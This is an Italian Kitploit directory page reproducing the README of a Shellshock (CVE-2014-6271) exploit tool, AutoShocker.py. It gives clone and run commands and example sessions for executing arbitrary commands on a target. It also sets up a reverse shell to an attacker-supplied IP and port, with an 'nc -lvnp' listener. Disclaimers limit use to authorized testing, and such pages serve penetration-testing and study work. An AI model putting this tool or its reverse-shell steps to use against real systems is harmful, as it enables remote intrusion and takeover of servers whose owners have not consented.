Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2014-6271-SHELLSHOCK — Script di automazione per sfruttare la vulnerabilità Shellshock. | Kitploit
Strumenti/GitHubGitHub/yunchohang/cve-2014-6271-shellshock
ExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneStrumento di Accesso Remoto
GitHubyunchohang/cve-2014-6271-shellshock

CVE-2014-6271-SHELLSHOCK

Script di automazione per sfruttare la vulnerabilità Shellshock.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 anno faNon ancora revisionato

CVE-2014-6271-SHELLSHOCK

🐚 Script di sfruttamento Shellshock 🎯💻🔍

Questo script Python sfrutta la vulnerabilità Shellshock (CVE-2014-6271) per eseguire comandi in remoto o stabilire una reverse shell su un target vulnerabile. 🛠️⚠️


⚠ Dichiarazione di non responsabilità 🚨❗

Questo script è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'uso non autorizzato contro sistemi per i quali non si ha esplicita autorizzazione è illegale e non etico. Ottenere sempre la debita autorizzazione prima di effettuare qualsiasi test di sicurezza. ⚠️🛑🚔


🔥 Funzionalità

  • Eseguire comandi arbitrari su un sistema vulnerabile utilizzando l'exploit Shellshock.
  • Stabilire una connessione reverse shell verso la macchina dell'attaccante.

📌 Prerequisiti 🎓

  • Un sistema vulnerabile a Shellshock (ad esempio, un server Apache obsoleto con CGI abilitato).
  • Python 3 installato.
  • curl installato sul proprio sistema.

📥 Installazione

Clonare il repository:

root@kitploit:~
git clone https://github.com/YunchoHang/CVE-2014-6271-SHELLSHOCK.git
cd CVE-2014-6271-SHELLSHOCK

🚀 Utilizzo

Eseguire lo script:

root@kitploit:~
python3 AutoShocker.py

🔘 Opzioni

  1. Esegui comandi usando curl – Permette di eseguire comandi arbitrari sulla macchina target.
  2. Ottieni una reverse shell – Stabilisce una connessione reverse shell verso la macchina attaccante.

💡 Esempio di utilizzo

Esecuzione di comandi:

root@kitploit:~
python3 AutoShocker.py
Enter the target IP: 192.168.1.100
Choose an option (1 or 2): 1
Enter the commands you want to execute: whoami && id

Reverse Shell:

root@kitploit:~
python3 AutoShocker.py
Enter the target IP: 192.168.1.100
Choose an option (1 or 2): 2
Enter your IP (listener): 192.168.1.200
Enter the port for reverse shell (e.g., 4444): 4444

Avviare il listener sulla propria macchina:

root@kitploit:~
nc -lvnp 4444

⚠ Avvertenza

  • Non utilizzare questo strumento per accessi non autorizzati.
  • Eseguirlo su una macchina per cui non si ha il permesso di test è illegale.
  • Assicurarsi di avere esplicita autorizzazione prima di eseguire test di sicurezza.

📜 Licenza

Questo progetto è solo per scopi educativi. L'autore non è responsabile per qualsiasi uso improprio. 📖⚠️🔍

Scarica lo strumento